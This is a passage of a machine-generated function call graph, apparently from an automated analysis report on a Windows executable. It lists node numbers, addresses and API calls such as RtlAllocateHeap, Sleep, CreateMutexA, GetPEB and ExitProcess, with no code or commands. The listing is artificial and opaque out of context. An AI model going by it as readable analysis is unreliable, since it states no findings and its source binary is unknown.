10397->10400 10398->10400 10400->10349 10402 66d500 10401->10402 10403 66a688 RtlAllocateHeap 10402->10403 10407 66d527 10402->10407 10409 66d52d 10402->10409 10403->10407 10404 66d572 10405 667443 RtlAllocateHeap 10404->10405 10406 66d577 10405->10406 10408 666b8a RtlAllocateHeap 10406->10408 10407->10404 10407->10409 10421 66d55c 10407->10421 10408->10421 10410 66d5e6 10409->10410 10411 66d6db 10409->10411 10413 66d611 10409->10413 10410->10413 10425 66d4eb 10410->10425 10412 66651d 3 API calls 10411->10412 10414 66d6ee 10412->10414 10416 66a531 4 API calls 10413->10416 10419 66d665 10413->10419 10413->10421 10416->10419 10418 66d4eb 4 API calls 10418->10413 10420 66a531 4 API calls 10419->10420 10419->10421 10420->10421 10421->10396 10423 6663f7 3 API calls 10422->10423 10424 66652e 10423->10424 10426 66a531 4 API calls 10425->10426 10427 66d4f0 10426->10427 10427->10418 10450 647870 10428->10450 10430 6326c2 10431 6326e5 10430->10431 10464 648e70 10430->10464 10433 648e70 RtlAllocateHeap 10431->10433 10434 63274e 10431->10434 10433->10434 10435 6327ad 10434->10435 10437 632878 10434->10437 10436 6637dc RtlAllocateHeap 10435->10436 10440 63280b 10436->10440 10438 666b9a RtlAllocateHeap 10437->10438 10438->10440 10439 63283a 10439->10371 10440->10439 10441 666b9a RtlAllocateHeap 10440->10441 10442 632882 10441->10442 10485 66383f 10442->10485 10444 6328a5 10444->10371 10446 6477eb 10445->10446 10447 647806 10445->10447 10446->10447 10448 666b9a RtlAllocateHeap 10446->10448 10447->10373 10449 64782a 10448->10449 10451 647896 10450->10451 10452 64789d 10451->10452 10453 6478f1 10451->10453 10454 6478d2 10451->10454 10452->10430 10459 64d312 RtlAllocateHeap 10453->10459 10462 6478e6 10453->10462 10455 647929 10454->10455 10456 6478d9 10454->10456 10457 632440 RtlAllocateHeap 10455->10457 10458 64d312 RtlAllocateHeap 10456->10458 10460 6478df 10457->10460 10458->10460 10459->10462 10461 666b9a RtlAllocateHeap 10460->10461 10460->10462 10463 647933 10461->10463 10462->10430 10463->10430 10465 648fbe 10464->10465 10466 648e9b 10464->10466 10467 6491a0 RtlAllocateHeap 10465->10467 10470 648ee2 10466->10470 10471 648f0c 10466->10471 10468 648fc3 10467->10468 10469 632440 RtlAllocateHeap 10468->10469 10477 648ef3 10469->10477 10470->10468 10472 648eed 10470->10472 10473 64d312 RtlAllocateHeap 10471->10473 10471->10477 10475 64d312 RtlAllocateHeap 10472->10475 10473->10477 10474 666b9a RtlAllocateHeap 10476 648fcd 10474->10476 10475->10477 10478 632440 10476->10478 10479 648fe8 10476->10479 10482 648fee 10476->10482 10477->10474 10480 648f7c 10477->10480 10483 6637dc RtlAllocateHeap 10478->10483 10481 64d312 RtlAllocateHeap 10479->10481 10480->10431 10481->10482 10482->10431 10484 632483 10483->10484 10484->10431 10486 66384c 10485->10486 10488 663853 10485->10488 10487 668a66 RtlAllocateHeap 10486->10487 10487->10488 10488->10444 10492 64b506 10489->10492 10491 632432 10493 64b521 10492->10493 10494 668aaf 4 API calls 10493->10494 10496 64b588 10493->10496 10495 64b5cf 10494->10495 10496->10491 10497 639e74 10498 639e7c 10497->10498 10499 639f4f 10498->10499 10500 63a85b 10498->10500 10503 647f30 RtlAllocateHeap 10499->10503 10501 63a883 Sleep CreateMutexA 10500->10501 10502 666b9a RtlAllocateHeap 10500->10502 10504 63a8be 10501->10504 10502->10501 10505 63a833 10503->10505 10515 63a47d 10516 63a485 10515->10516 10517 63a558 10516->10517 10518 63a874 10516->10518 10521 647f30 RtlAllocateHeap 10517->10521 10519 666b9a RtlAllocateHeap 10518->10519 10520 63a879 10519->10520 10522 666b9a RtlAllocateHeap 10520->10522 10523 63a833 10521->10523 10524 63a87e 10522->10524 10525 63a883 Sleep CreateMutexA 10524->10525 10526 666b9a RtlAllocateHeap 10524->10526 10527 63a8be 10525->10527 10526->10525 10568 648440 10569 64848f 10568->10569 10572 64849c 10568->10572 10574 649c30 10569->10574 10570 6484f4 10572->10570 10595 649f90 10572->10595 10575 649d61 10574->10575 10578 649c55 10574->10578 10576 6491a0 RtlAllocateHeap 10575->10576 10587 649cbb 10576->10587 10577 666b9a RtlAllocateHeap 10586 649d6b 10577->10586 10579 649d5c 10578->10579 10580 649cd1 10578->10580 10581 649caa 10578->10581 10582 632440 RtlAllocateHeap 10579->10582 10585 64d312 RtlAllocateHeap 10580->10585 10580->10587 10581->10579 10583 649cb5 10581->10583 10582->10575 10584 64d312 RtlAllocateHeap 10583->10584 10584->10587 10585->10587 10588 649da0 10586->10588 10589 666b9a RtlAllocateHeap 10586->10589 10587->10577 10590 649d2c 10587->10590 10588->10572 10591 649dc6 10589->10591 10590->10572 10592 649dfa 10591->10592 10593 666b9a RtlAllocateHeap 10591->10593 10592->10572 10594 649e1e 10593->10594 10596 64a0e1 10595->10596 10600 649fb3 10595->10600 10597 6491a0 RtlAllocateHeap 10596->10597 10608 64a014 10597->10608 10598 666b9a RtlAllocateHeap 10606 64a0eb 10598->10606 10599 64a0dc 10601 632440 RtlAllocateHeap 10599->10601 10600->10599 10602 64a003 10600->10602 10603 64a02d 10600->10603 10601->10596 10602->10599 10604 64a00e 10602->10604 10605 64d312 RtlAllocateHeap 10603->10605 10603->10608 10607 64d312 RtlAllocateHeap 10604->10607 10605->10608 10606->10572 10607->10608 10608->10598 10609 64a09c 10608->10609 10609->10572 10610 64d041 10613 64d051 10610->10613 10611 64d05a 10613->10611 10614 64d0c9 10613->10614 10615 64d0d7 SleepConditionVariableCS 10614->10615 10617 64d0f0 10614->10617 10615->10617 10617->10613 10618 633c4e 10619 633c58 10618->10619 10620 633c74 10619->10620 10628 6323d0 10619->10628 10624 633c8f 10620->10624 10625 6337d0 4 API calls 10620->10625 10626 6337d0 4 API calls 10624->10626 10625->10624 10627 633c9b 10626->10627 10629 6323e4 10628->10629 10643 64b45d 10629->10643 10632 633ca0 10633 633d02 10632->10633 10635 633d12 10632->10635 10861 647bc0 10633->10861 10636 64d312 RtlAllocateHeap 10635->10636 10637 633d44 10636->10637 10638 647bc0 RtlAllocateHeap 10637->10638 10640 633dc3 10637->10640 10638->10640 10639 633e5b 10639->10620 10640->10639 10641 666b9a RtlAllocateHeap 10640->10641 10642 633e81 10641->10642 10651 663a1a 10643->10651 10645 6323ea 10645->10632 10646 64b4d5 10658 64b0dd 10646->10658 10648 64b4c8 10654 64ae86 10648->10654 10662 664e59 10651->10662 10653 64b485 10653->10645 10653->10646 10653->10648 10655 64aecf 10654->10655 10657 64aee2 10655->10657 10674 64b2cf 10655->10674 10657->10645 10659 64b111 10658->10659 10660 64b108 10658->10660 10659->10645 10661 64b2cf 5 API calls 10660->10661 10661->10659 10669 664e67 10662->10669 10664 664e5e 10664->10653 10665 66d4f4 4 API calls 10664->10665 10668 668abf 10664->10668 10665->10668 10666 66651d 3 API calls 10667 668af2 10666->10667 10668->10666 10670 664e70 10669->10670 10672 664e73 10669->10672 10670->10664 10671 664ea7 10671->10664 10672->10671 10673 668a66 RtlAllocateHeap 10672->10673 10673->10671 10675 64be0f InitOnceExecuteOnce 10674->10675 10676 64b311 10675->10676 10677 64b318 10676->10677 10685 666beb 10676->10685 10677->10657 10679 64b34e 10680 64be0f InitOnceExecuteOnce 10679->10680 10681 64b391 10680->10681 10682 64b398 10681->10682 10683 666beb 4 API calls 10681->10683 10682->10657 10684 64b3ce 10683->10684 10684->10657 10686 666bf7 10685->10686 10687 66a531 4 API calls 10686->10687 10688 666bfc 10687->10688 10689 668aaf 4 API calls 10688->10689 10690 666c26 10689->10690 10691 666c35 10690->10691 10692 666c43 10690->10692 10703 666c99 10691->10703 10724 6668bd 10692->10724 10695 666c3f 10695->10679 10696 666c5d 10727 66681d 10696->10727 10699 666c71 10701 666c93 10699->10701 10702 66acb5 RtlAllocateHeap 10699->10702 10700 666c99 RtlAllocateHeap 10700->10699 10701->10679 10702->10701 10704 666ca7 10703->10704 10705 666cc4 10703->10705 10730 667430 10704->10730 10708 666d06 10705->10708 10709 666cea 10705->10709 10716 666d2a 10708->10716 10717 666d38 10708->10717 10711 667430 RtlAllocateHeap 10709->10711 10710 667443 RtlAllocateHeap 10712 666cb4 10710->10712 10713 666cef 10711->10713 10714 666b8a RtlAllocateHeap 10712->10714 10715 667443 RtlAllocateHeap 10713->10715 10718 666cbf 10714->10718 10720 666cf6 10715->10720 10733 666e01 10716->10733 10746 666d77 10717->10746 10718->10695 10722 666b8a RtlAllocateHeap 10720->10722 10723 666d01 10722->10723 10723->10695 10791 66683a 10724->10791 10726 6668cf 10726->10696 10836 66676b 10727->10836 10731 66a688 RtlAllocateHeap 10730->10731 10732 666cac 10731->10732 10732->10710 10734 666e28 10733->10734 10735 666eee 10734->10735 10736 666e3c 10734->10736 10738 666efc 10735->10738 10739 666ee5 10735->10739 10741 666f0b 10735->10741 10742 666e56 10736->10742 10755 667177 10736->10755 10740 667443 RtlAllocateHeap 10738->10740 10739->10723 10740->10739 10764 66740d 10741->10764 10742->10739 10742->10741 10744 666e8b 10742->10744 10759 667096 10744->10759 10769 667314 10746->10769 10748 666d85 10749 666d96 10748->10749 10750 666d8a 10748->10750 10753 667177 RtlAllocateHeap 10749->10753 10751 66740d RtlAllocateHeap 10750->10751 10752 666d91 10751->10752 10752->10723 10754 666dc2 10753->10754 10754->10723 10756 667190 10755->10756 10757 6671b1 10756->10757 10758 66740d RtlAllocateHeap 10756->10758 10757->10742 10758->10757 10760 6670aa 10759->10760 10761 6670b4 10760->10761 10762 667443 RtlAllocateHeap 10760->10762 10761->10739 10763 6670bf 10762->10763 10763->10739 10765 667430 RtlAllocateHeap 10764->10765 10766 667418 10765->10766 10767 667443 RtlAllocateHeap 10766->10767 10768 66742b 10767->10768 10768->10739 10770 667338 10769->10770 10772 66733e 10770->10772 10775 667036 10770->10775 10772->10748 10773 667364 10774 668a66 RtlAllocateHeap 10773->10774 10774->10772 10776 667443 RtlAllocateHeap 10775->10776 10777 667042 10776->10777 10778 667443 RtlAllocateHeap 10777->10778 10779 667049 10778->10779 10788 66b87b 10779->10788 10782 667443 RtlAllocateHeap 10783 667064 10782->10783 10784 667068 10783->10784 10785 667443 RtlAllocateHeap 10783->10785 10784->10773 10786 66707c 10785->10786 10787 66b87b RtlAllocateHeap 10786->10787 10787->10784 10789 66b6de RtlAllocateHeap 10788->10789 10790 66705a 10789->10790 10790->10782 10792 666851 10791->10792 10793 66685a 10791->10793 10792->10726 10793->10792 10794 66a531 4 API calls 10793->10794 10795 66687a 10794->10795 10799 66b4bb 10795->10799 10800 666890 10799->10800 10801 66b4ce 10799->10801 10803 66b4e8 10800->10803 10801->10800 10807 66f46b 10801->10807 10804 66b510 10803->10804 10805 66b4fb 10803->10805 10804->10792 10805->10804 10820 66e571 10805->10820 10808 66f477 10807->10808 10809 66a531 4 API calls 10808->10809 10810 66f480 10809->10810 10813 66f4c6 10810->10813 10816 66f4ec 10810->10816 10812 66f4af 10812->10813 10814 668aaf 4 API calls 10812->10814 10813->10800 10815 66f4eb 10814->10815 10817 66f4fa 10816->10817 10819 66f507 10816->10819 10818 66f21f RtlAllocateHeap 10817->10818 10817->10819 10818->10819 10819->10812 10821 66a531 4 API calls 10820->10821 10822 66e57b 10821->10822 10825 66e489 10822->10825 10824 66e581 10824->10804 10829 66e495 10825->10829 10826 66e4b6 10826->10824 10827 66e4af 10827->10826 10828 668aaf GetPEB ExitProcess GetPEB RtlAllocateHeap 10827->10828 10830 66e528 10828->10830 10829->10827 10832 66acb5 RtlAllocateHeap 10829->10832 10831 66e564 10830->10831 10833 66a5ee GetPEB ExitProcess GetPEB RtlAllocateHeap 10830->10833 10831->10824 10832->10827 10834 66e555 10833->10834 10835 66e370 GetPEB ExitProcess GetPEB RtlAllocateHeap 10834->10835 10835->10831 10837 666793 10836->10837 10838 666779 10836->10838 10840 66679a 10837->10840 10842 6667b9 10837->10842 10849 6668fc 10838->10849 10846 666783 10840->10846 10853 666916 10840->10853 10843 666916 RtlAllocateHeap 10842->10843 10844 6667cf 10842->10844 10843->10844 10845 66740d RtlAllocateHeap 10844->10845 10844->10846 10847 6667db 10845->10847 10846->10699 10846->10700 10848 667443 RtlAllocateHeap 10847->10848 10848->10846 10850 666907 10849->10850 10851 66690f 10849->10851 10852 66acb5 RtlAllocateHeap 10850->10852 10851->10846 10852->10851 10854 6668fc RtlAllocateHeap 10853->10854 10855 666924 10854->10855 10858 666955 10855->10858 10859 66af0b RtlAllocateHeap 10858->10859 10860 666935 10859->10860 10860->10846 10862 647bd2 10861->10862 10863 647c3b 10861->10863 10865 647c0c 10862->10865 10866 647bdd 10862->10866 10864 632440 RtlAllocateHeap 10863->10864 10874 647bea 10864->10874 10868 647c29 10865->10868 10869 64d312 RtlAllocateHeap 10865->10869 10866->10863 10867 647be4 10866->10867 10871 64d312 RtlAllocateHeap 10867->10871 10868->10635 10872 647c16 10869->10872 10870 666b9a RtlAllocateHeap 10873 647c45 10870->10873 10871->10874 10872->10635 10874->10870 10875 647bf3 10874->10875 10875->10635 10883 648250 10884 648269 10883->10884 10885 64827d 10884->10885 10886 648e70 RtlAllocateHeap 10884->10886 10886->10885 10887 647c50 10890 647c9c 10887->10890 10891 647c71 10887->10891 10888 647d90 10889 6491a0 RtlAllocateHeap 10888->10889 10904 647d01 10889->10904 10890->10888 10893 647d8b 10890->10893 10894 647d17 10890->10894 10895 647cf0 10890->10895 10892 666b9a RtlAllocateHeap 10900 647d9a 10892->10900 10896 632440 RtlAllocateHeap 10893->10896 10899 64d312 RtlAllocateHeap 10894->10899 10894->10904 10895->10893 10897 647cfb 10895->10897 10896->10888 10898 64d312 RtlAllocateHeap 10897->10898 10898->10904 10899->10904 10901 647dd1 10900->10901 10903 666b9a RtlAllocateHeap 10900->10903 10902 647d72 10905 647dec 10903->10905 10904->10892 10904->10902 10906 666659 10909 6665a2 10906->10909 10908 66666b 10912 6665ae 10909->10912 10910 6665b5 10911 667443 RtlAllocateHeap 10910->10911 10913 6665ba 10911->10913 10912->10910 10914 6665d5 10912->10914 10915 666b8a RtlAllocateHeap 10913->10915 10916 6665e7 10914->10916 10917 6665da 10914->10917 10922 6665c5 10915->10922 10923 66a783 10916->10923 10918 667443 RtlAllocateHeap 10917->10918 10918->10922 10920 6665f0 10921 667443 RtlAllocateHeap 10920->10921 10920->10922 10921->10922 10922->10908 10924 66a78f 10923->10924 10927 66a827 10924->10927 10926 66a7aa 10926->10920 10929 66a84a 10927->10929 10928 66d6ef RtlAllocateHeap 10930 66a8ab 10928->10930 10929->10928 10932 66a890 10929->10932 10931 66acb5 RtlAllocateHeap 10930->10931 10931->10932 10932->10926 10966 631020 10967 647f30 RtlAllocateHeap 10966->10967 10968 631031 10967->10968 10969 64d57e RtlAllocateHeap 10968->10969 10970 63103b 10969->10970 10980 66ba2d 10981 66ba57 10980->10981 10982 66ba3d 10980->10982 10984 66ba76 10981->10984 10985 66ba5f 10981->10985 10983 667443 RtlAllocateHeap 10982->10983 10986 66ba42 10983->10986 10988 66683a 4 API calls 10984->10988 10987 667443 RtlAllocateHeap 10985->10987 10989 666b8a RtlAllocateHeap 10986->10989 10990 66ba64 10987->10990 10992 66ba4d 10988->10992 10989->10992 10991 666b8a RtlAllocateHeap 10990->10991 10991->10992 11002 647830 11003 647850 11002->11003 11003->11003 11004 647f30 RtlAllocateHeap 11003->11004 11005 647862 11004->11005 11006 634236 11007 6323d0 5 API calls 11006->11007 11008 63423f 11007->11008 11009 633ca0 RtlAllocateHeap 11008->11009 11010 63424f 11009->11010 11032 633400 11037 632af0 11032->11037 11034 63340f 11035 6637dc RtlAllocateHeap 11034->11035 11036 633443 11035->11036 11038 6637dc RtlAllocateHeap 11037->11038 11039 632b28 11038->11039 11039->11034 11019 633800 11020 6338b6 11019->11020 11022 63381f 11019->11022 11021 6338e0 11029 649110 11021->11029 11022->11020 11022->11021 11026 63388d 11022->11026 11027 6338db 11022->11027 11024 6338e5 11025 647bc0 RtlAllocateHeap 11025->11020 11026->11025 11028 666b9a RtlAllocateHeap 11027->11028 11028->11021 11030 64c0e9 RtlAllocateHeap 11029->11030 11031 64911a 11030->11031 11031->11024 11040 631000 11041 64d57e RtlAllocateHeap 11040->11041 11042 63100a 11041->11042 11073 633c07 11074 633c11 11073->11074 11076 633290 6 API calls 11074->11076 11077 633c1f 11074->11077 11075 633c28 11076->11077 11077->11075 11078 6337d0 4 API calls 11077->11078 11079 633c9b 11078->11079 11080 639a0c 11081 639a1a 11080->11081 11085 639a2e 11080->11085 11082 63a847 11081->11082 11081->11085 11083 63a883 Sleep CreateMutexA 11082->11083 11084 666b9a RtlAllocateHeap 11082->11084 11086 63a8be 11083->11086 11084->11083 11087 647870 RtlAllocateHeap 11085->11087 11088 639aa4 11087->11088 11103 635b20 11088->11103 11090 639aac 11154 638a60 11090->11154 11092 639abd 11191 648150 11092->11191 11094 639acc 11095 647870 RtlAllocateHeap 11094->11095 11096 639bd9 11095->11096 11097 635b20 4 API calls 11096->11097 11098 639be1 11097->11098 11099 638a60 4 API calls 11098->11099 11100 639bf2 11099->11100 11101 648150 RtlAllocateHeap 11100->11101 11102 639c01 11101->11102 11199 635850 11103->11199 11105 635b64 11202 634af0 11105->11202 11107 635b8b 11108 635c27 11107->11108 11109 666b9a RtlAllocateHeap 11107->11109 11108->11090 11110 635c57 11109->11110 11110->11110 11111 647f30 RtlAllocateHeap 11110->11111 11113 635d4e 11111->11113 11112 635db6 11112->11090 11113->11112 11114 666b9a RtlAllocateHeap 11113->11114 11115 635de2 11114->11115 11116 635f0e 11115->11116 11117 666b9a RtlAllocateHeap 11115->11117 11116->11090 11118 635f2b 11117->11118 11119 647f30 RtlAllocateHeap 11118->11119 11120 635f99 11119->11120 11121 647f30 RtlAllocateHeap 11120->11121 11122 635fcd 11121->11122 11123 647f30 RtlAllocateHeap 11122->11123 11124 635ffe 11123->11124 11125 647f30 RtlAllocateHeap 11124->11125 11126 63602f 11125->11126 11127 647f30 RtlAllocateHeap 11126->11127 11129 636060 11127->11129 11128 636578 11128->11090 11129->11128 11130 666b9a RtlAllocateHeap 11129->11130 11131 6365a3 11130->11131 11132 647870 RtlAllocateHeap 11131->11132 11133 636676 11132->11133 11134 635b20 4 API calls 11133->11134 11135 63667c 11134->11135 11136 635b20 4 API calls 11135->11136 11137 636681 11136->11137 11209 632280 11137->11209 11139 636699 11140 647870 RtlAllocateHeap 11139->11140 11141 636702 11140->11141 11142 635b20 4 API calls 11141->11142 11143 63670d 11142->11143 11144 632280 4 API calls 11143->11144 11153 636727 11144->11153 11145 636822 11146 647f30 RtlAllocateHeap 11145->11146 11148 63686c 11146->11148 11147 647870 RtlAllocateHeap 11147->11153 11149 647f30 RtlAllocateHeap 11148->11149 11152 6368b3 11149->11152 11150 635b20 4 API calls 11150->11153 11151 632280 4 API calls 11151->11153 11152->11090 11153->11145 11153->11147 11153->11150 11153->11151 11155 638aac 11154->11155 11156 647870 RtlAllocateHeap 11155->11156 11157 638abc 11156->11157 11158 635b20 4 API calls 11157->11158 11159 638ac7 11158->11159 11160 647f30 RtlAllocateHeap 11159->11160 11161 638b13 11160->11161 11162 647f30 RtlAllocateHeap 11161->11162 11163 638b65 11162->11163 11164 648150 RtlAllocateHeap 11163->11164 11167 638b77 11164->11167 11165 638c31 11165->11092 11166 666b9a RtlAllocateHeap 11168 638c5d 11166->11168 11167->11165 11167->11166 11169 647870 RtlAllocateHeap 11168->11169 11170 638cbf 11169->11170 11171 635b20 4 API calls 11170->11171 11172 638cca 11171->11172 11173 647f30 RtlAllocateHeap 11172->11173 11174 638d1c 11173->11174 11175 648150 RtlAllocateHeap 11174->11175 11177 638d2e 11175->11177 11176 638dae 11176->11092 11177->11176 11178 666b9a RtlAllocateHeap 11177->11178 11179 638dda 11178->11179 11180 647870 RtlAllocateHeap 11179->11180 11181 638e3f 11180->11181 11182 635b20 4 API calls 11181->11182 11183 638e4a 11182->11183 11184 647f30 RtlAllocateHeap 11183->11184 11185 638e9c 11184->11185 11186 648150 RtlAllocateHeap 11185->11186 11188 638eae 11186->11188 11187 638f2e 11187->11092 11188->11187 11189 666b9a RtlAllocateHeap 11188->11189 11190 638f5a 11189->11190 11192 6481c2 11191->11192 11193 648178 11191->11193 11196 648e70 RtlAllocateHeap 11192->11196 11198 6481d1 11192->11198 11193->11192 11194 648181 11193->11194 11513 6491b0 11194->11513 11196->11198 11197 64818a 11197->11094 11198->11094 11212 647df0 11199->11212 11201 63587b 11201->11105 11203 634b24 11202->11203 11204 634b4e 11202->11204 11205 647f30 RtlAllocateHeap 11203->11205 11207 647df0 RtlAllocateHeap 11204->11207 11206 634b3b 11205->11206 11206->11107 11208 634bab 11207->11208 11208->11107 11227 632240 11209->11227 11215 647e37 11212->11215 11216 647e0e 11212->11216 11213 647f23 11214 6491a0 RtlAllocateHeap 11213->11214 11217 647f28 11214->11217 11215->11213 11218 647eae 11215->11218 11219 647e8b 11215->11219 11216->11201 11220 632440 RtlAllocateHeap 11217->11220 11223 64d312 RtlAllocateHeap 11218->11223 11224 647e9c 11218->11224 11219->11217 11222 64d312 RtlAllocateHeap 11219->11222 11221 647f2d 11220->11221 11222->11224 11223->11224 11225 666b9a RtlAllocateHeap 11224->11225 11226 647f05 11224->11226 11225->11213 11226->11201 11228 632256 11227->11228 11231 668667 11228->11231 11234 667456 11231->11234 11233 632264 11233->11139 11235 667496 11234->11235 11236 66747e 11234->11236 11235->11236 11237 66749e 11235->11237 11238 667443 RtlAllocateHeap 11236->11238 11240 66683a 4 API calls 11237->11240 11239 667483 11238->11239 11241 666b8a RtlAllocateHeap 11239->11241 11242 6674ae 11240->11242 11243 66748e 11241->11243 11247 667a11 11242->11247 11243->11233 11263 6684da 11247->11263 11249 667535 11260 667866 11249->11260 11250 667a31 11251 667443 RtlAllocateHeap 11250->11251 11252 667a36 11251->11252 11253 666b8a RtlAllocateHeap 11252->11253 11253->11249 11254 667a22 11254->11249 11254->11250 11270 667b62 11254->11270 11278 667fb5 11254->11278 11283 667c0f 11254->11283 11288 667c35 11254->11288 11317 667d83 11254->11317 11261 66acb5 RtlAllocateHeap 11260->11261 11262 667876 11261->11262 11262->11243 11264 6684f2 11263->11264 11265 6684df 11263->11265 11264->11254 11266 667443 RtlAllocateHeap 11265->11266 11267 6684e4 11266->11267 11268 666b8a RtlAllocateHeap 11267->11268 11269 6684ef 11268->11269 11269->11254 11339 667b81 11270->11339 11272 667b67 11273 667b7e 11272->11273 11274 667443 RtlAllocateHeap 11272->11274 11273->11254 11275 667b70 11274->11275 11276 666b8a RtlAllocateHeap 11275->11276 11277 667b7b 11276->11277 11277->11254 11279 667fc5 11278->11279 11280 667fbe 11278->11280 11279->11254 11348 66799d 11280->11348 11284 667c1f 11283->11284 11285 667c18 11283->11285 11284->11254 11286 66799d 4 API calls 11285->11286 11287 667c1e 11286->11287 11287->11254 11289 667c56 11288->11289 11290 667c3c 11288->11290 11291 667c86 11289->11291 11294 667443 RtlAllocateHeap 11289->11294 11290->11291 11292 667d9c 11290->11292 11293 667e08 11290->11293 11291->11254 11304 667ddf 11292->11304 11307 667da8 11292->11307 11296 667e4e 11293->11296 11297 667e0f 11293->11297 11293->11304 11295 667c72 11294->11295 11298 666b8a RtlAllocateHeap 11295->11298 11407 668451 11296->11407 11301 667e14 11297->11301 11302 667db6 11297->11302 11300 667c7d 11298->11300 11300->11254 11301->11304 11306 667e19 11301->11306 11314 667dc4 11302->11314 11316 667dd8 11302->11316 11401 66808e 11302->11401 11304->11314 11304->11316 11392 66826d 11304->11392 11305 667def 11305->11316 11378 6681dd 11305->11378 11309 667e1e 11306->11309 11310 667e2c 11306->11310 11307->11302 11307->11305 11307->11314 11309->11316 11382 668432 11309->11382 11386 6683be 11310->11386 11314->11316 11410 668537 11314->11410 11316->11254 11318 667d9c 11317->11318 11319 667e08 11317->11319 11327 667ddf 11318->11327 11329 667da8 11318->11329 11320 667e4e 11319->11320 11321 667e0f 11319->11321 11319->11327 11324 668451 RtlAllocateHeap 11320->11324 11322 667e14 11321->11322 11323 667db6 11321->11323 11326 667e19 11322->11326 11322->11327 11325 66808e 4 API calls 11323->11325 11336 667dc4 11323->11336 11338 667dd8 11323->11338 11324->11336 11325->11336 11331 667e1e 11326->11331 11332 667e2c 11326->11332 11330 66826d RtlAllocateHeap 11327->11330 11327->11336 11327->11338 11328 667def 11334 6681dd 4 API calls 11328->11334 11328->11338 11329->11323 11329->11328 11329->11336 11330->11336 11335 668432 RtlAllocateHeap 11331->11335 11331->11338 11333 6683be RtlAllocateHeap 11332->11333 11333->11336 11334->11336 11335->11336 11337 668537 4 API calls 11336->11337 11336->11338 11337->11338 11338->11254 11342 667bab 11339->11342 11341 667b8d 11341->11272 11344 667bcd 11342->11344 11343 667c04 11343->11341 11344->11343 11345 667443 RtlAllocateHeap 11344->11345 11346 667bf9 11345->11346 11347 666b8a RtlAllocateHeap 11346->11347 11347->11343 11349 6679af 11348->11349 11350 6679b4 11348->11350 11352 667443 RtlAllocateHeap 11349->11352 11356 668979 11350->11356 11352->11350 11354 667443 RtlAllocateHeap 11355 6679e6 11354->11355 11355->11254 11357 668994 11356->11357 11360 6686d7 11357->11360 11361 6684da RtlAllocateHeap 11360->11361 11362 6686e9 11361->11362 11363 668722 11362->11363 11364 6686fe 11362->11364 11377 6679d2 11362->11377 11365 66683a GetPEB ExitProcess GetPEB RtlAllocateHeap 11363->11365 11366 667443 RtlAllocateHeap 11364->11366 11370 66872e 11365->11370 11367 668703 11366->11367 11369 666b8a RtlAllocateHeap 11367->11369 11368 668925 GetPEB ExitProcess GetPEB RtlAllocateHeap 11368->11370 11369->11377 11370->11368 11371 66875d 11370->11371 11373 6688fc RtlAllocateHeap 11371->11373 11374 6687c7 11371->11374 11372 6688fc RtlAllocateHeap 11375 66888f 11372->11375 11373->11374 11374->11372 11376 667443 RtlAllocateHeap 11375->11376 11375->11377 11376->11377 11377->11354 11377->11355 11380 6681f8 11378->11380 11379 66822a 11379->11314 11380->11379 11414 66c65f 11380->11414 11383 66843e 11382->11383 11384 66826d RtlAllocateHeap 11383->11384 11385 668450 11384->11385 11385->11314 11391 6683d3 11386->11391 11387 667443 RtlAllocateHeap 11388 6683dc 11387->11388 11389 666b8a RtlAllocateHeap 11388->11389 11390 6683e7 11389->11390 11390->11314 11391->11387 11391->11390 11393 668280 11392->11393 11394 6682b2 11393->11394 11395 66829b 11393->11395 11400 6682ab 11394->11400 11438 6675ec 11394->11438 11396 667443 RtlAllocateHeap 11395->11396 11397 6682a0 11396->11397 11398 666b8a RtlAllocateHeap 11397->11398 11398->11400 11400->11314 11402 6680a7 11401->11402 11403 6675ec RtlAllocateHeap 11402->11403 11404 6680e4 11403->11404 11451 66d199 11404->11451 11406 66815a 11406->11314 11406->11406 11408 66826d RtlAllocateHeap 11407->11408 11409 668468 11408->11409 11409->11314 11411 6685aa 11410->11411 11413 668554 11410->11413 11411->11316 11412 66c65f 4 API calls 11412->11413 11413->11411 11413->11412 11417 66c504 11414->11417 11418 66c514 11417->11418 11419 66c552 11418->11419 11420 66c53e 11418->11420 11429 66c519 11418->11429 11422 66683a GetPEB ExitProcess GetPEB RtlAllocateHeap 11419->11422 11421 667443 RtlAllocateHeap 11420->11421 11423 66c543 11421->11423 11424 66c55d 11422->11424 11425 666b8a RtlAllocateHeap 11423->11425 11426 66c56d 11424->11426 11430 66c599 11424->11430 11425->11429 11427 672a3d RtlAllocateHeap 11426->11427 11428 66c582 11427->11428 11428->11429 11432 667443 RtlAllocateHeap 11428->11432 11429->11379 11434 66c5af 11430->11434 11437 66c5e6 11430->11437 11431 667443 RtlAllocateHeap 11431->11429 11432->11429 11433 667443 RtlAllocateHeap 11435 66c650 11433->11435 11434->11429 11434->11431 11436 666b8a RtlAllocateHeap 11435->11436 11436->11429 11437->11429 11437->11433 11439 667610 11438->11439 11440 667601 11438->11440 11442 667606 11439->11442 11443 66af0b RtlAllocateHeap 11439->11443 11441 667443 RtlAllocateHeap 11440->11441 11441->11442 11442->11400 11444 667637 11443->11444 11445 66764e 11444->11445 11448 667880 11444->11448 11447 66acb5 RtlAllocateHeap 11445->11447 11447->11442 11449 66acb5 RtlAllocateHeap 11448->11449 11450 66788f 11449->11450 11450->11445 11452 66d1bf 11451->11452 11453 66d1a9 11451->11453 11452->11453 11457 66d1d1 11452->11457 11454 667443 RtlAllocateHeap 11453->11454 11455 66d1ae 11454->11455 11456 666b8a RtlAllocateHeap 11455->11456 11470 66d1b8 11456->11470 11459 66d238 11457->11459 11460 66d20a 11457->11460 11458 66d256 11463 66d2b5 11458->11463 11464 66d27f 11458->11464 11459->11458 11461 66d25b 11459->11461 11472 66d0d0 11460->11472 11477 66c9b0 11461->11477 11505 66ccc9 11463->11505 11465 66d284 11464->11465 11466 66d29d 11464->11466 11488 66d00f 11465->11488 11498 66ceb3 11466->11498 11470->11406 11473 66d0e6 11472->11473 11474 66d0f1 11472->11474 11473->11470 11475 66a0b1 RtlAllocateHeap 11474->11475 11476 66d14c 11475->11476 11476->11470 11478 66c9c2 11477->11478 11479 66683a GetPEB ExitProcess GetPEB RtlAllocateHeap 11478->11479 11480 66c9d6 11479->11480 11481 66c9f2 11480->11481 11482 66c9de 11480->11482 11485 66ccc9 GetPEB ExitProcess GetPEB RtlAllocateHeap 11481->11485 11487 66c9ed 11481->11487 11483 667443 RtlAllocateHeap 11482->11483 11484 66c9e3 11483->11484 11486 666b8a RtlAllocateHeap 11484->11486 11485->11487 11486->11487 11487->11470 11489 673068 RtlAllocateHeap 11488->11489 11490 66d03d 11489->11490 11491 672b07 RtlAllocateHeap 11490->11491 11492 66d06f 11491->11492 11493 66d076 11492->11493 11494 66d0af 11492->11494 11495 66d088 